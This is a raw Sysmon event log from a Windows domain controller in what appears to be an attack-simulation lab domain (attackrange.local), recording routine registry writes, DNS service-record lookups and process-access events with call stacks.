13:53:44.695{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002681Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:44.695{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\Global Catalog Promotion CompleteDWORD (0x00000001) 13241300x80000000000000002836Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.742{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002835Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:45.507{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x0000054d) 22542200x80000000000000002834Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.264{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002833Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.263{10ACEC4A-8541-5FCF-1500-000000009101}1364win-dc-935.attackrange.local0fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002832Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.259{10ACEC4A-853E-5FCF-0B00-000000009101}864ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002831Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.255{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002830Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.250{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002829Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.246{10ACEC4A-853E-5FCF-0B00-000000009101}864DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002828Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.242{10ACEC4A-853E-5FCF-0B00-000000009101}864_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002827Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.238{10ACEC4A-853E-5FCF-0B00-000000009101}864_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002826Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.234{10ACEC4A-853E-5FCF-0B00-000000009101}864_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.230{10ACEC4A-853E-5FCF-0B00-000000009101}864_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002824Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.225{10ACEC4A-853E-5FCF-0B00-000000009101}864_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002823Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.220{10ACEC4A-853E-5FCF-0B00-000000009101}864_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002822Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.215{10ACEC4A-853E-5FCF-0B00-000000009101}864_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002821Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.208{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002820Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.207{10ACEC4A-8541-5FCF-1000-000000009101}1156win-dc-935.attackrange.local0fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002819Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.202{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002818Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.197{10ACEC4A-853E-5FCF-0B00-000000009101}864win-dc-935.attackrange.local0fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002817Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.197{10ACEC4A-853E-5FCF-0B00-000000009101}864_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002816Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.192{10ACEC4A-853E-5FCF-0B00-000000009101}864_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002815Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.188{10ACEC4A-853E-5FCF-0B00-000000009101}864b75bd81a-3ed3-433f-afaf-e6ecdbf2a642._msdcs.attackrange.local.0type: 5 win-dc-935.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000002814Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.184{10ACEC4A-853E-5FCF-0B00-000000009101}864gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002813Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.183{10ACEC4A-8541-5FCF-1100-000000009101}1204win-dc-935.attackrange.local0fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002812Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.181{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.50215272-c8dc-4125-b5e0-31437a8b7ba7.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002811Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.176{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002810Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.173{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002809Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.170{10ACEC4A-853E-5FCF-0B00-000000009101}864_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002808Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.169{10ACEC4A-853E-5FCF-0B00-000000009101}864_msdcs.attackrange.local.0type: 2 win-dc-935.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002807Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.168{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002806Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.167{10ACEC4A-8551-5FCF-3400-000000009101}3224win-dc-935.attackrange.local0fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\dfssvc.exe 22542200x80000000000000002805Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.163{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002804Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.159{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002803Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.158{10ACEC4A-8551-5FCF-2C00-000000009101}2484attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002802Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.158{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.158{10ACEC4A-8541-5FCF-1000-000000009101}1156win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 22542200x80000000000000002800Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.157{10ACEC4A-853E-5FCF-0B00-000000009101}864attackrange.local.0type: 2 win-dc-935.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002799Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.157{10ACEC4A-8551-5FCF-2C00-000000009101}2484attackrange.local0type: 2 win-dc-935.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002798Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.156{10ACEC4A-8551-5FCF-2C00-000000009101}2484win-dc-935.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002797Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.156{10ACEC4A-8541-5FCF-1100-000000009101}1204attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002796Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.156{10ACEC4A-853E-5FCF-0B00-000000009101}864attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002795Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.155{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002794Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.153{10ACEC4A-8541-5FCF-1500-000000009101}1364_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002793Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.149{10ACEC4A-8541-5FCF-1500-000000009101}1364eu-central-1.compute.internal9502-C:\Windows\System32\svchost.exe 22542200x80000000000000002792Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:44.701{10ACEC4A-8551-5FCF-2C00-000000009101}2484win-dc-935.attackrange.local0fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002791Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:44.700{10ACEC4A-853E-5FCF-0B00-000000009101}864WIN-DC-9350fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000002790Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.351{10ACEC4A-8541-5FCF-1500-000000009101}13641444C:\Windows\system32\svchost.exe{10ACEC4A-8569-5FCF-8200-000000009101}4228C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002789Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.351{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8569-5FCF-8200-000000009101}4228C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002788Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002787Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002786Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002784Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8541-5FCF-1000-000000009101}11563680C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002783Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8541-5FCF-1000-000000009101}11561632C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002782Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8541-5FCF-1000-000000009101}11563680C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002781Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8541-5FCF-1000-000000009101}11561632C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002780Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002779Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002778Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002777Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 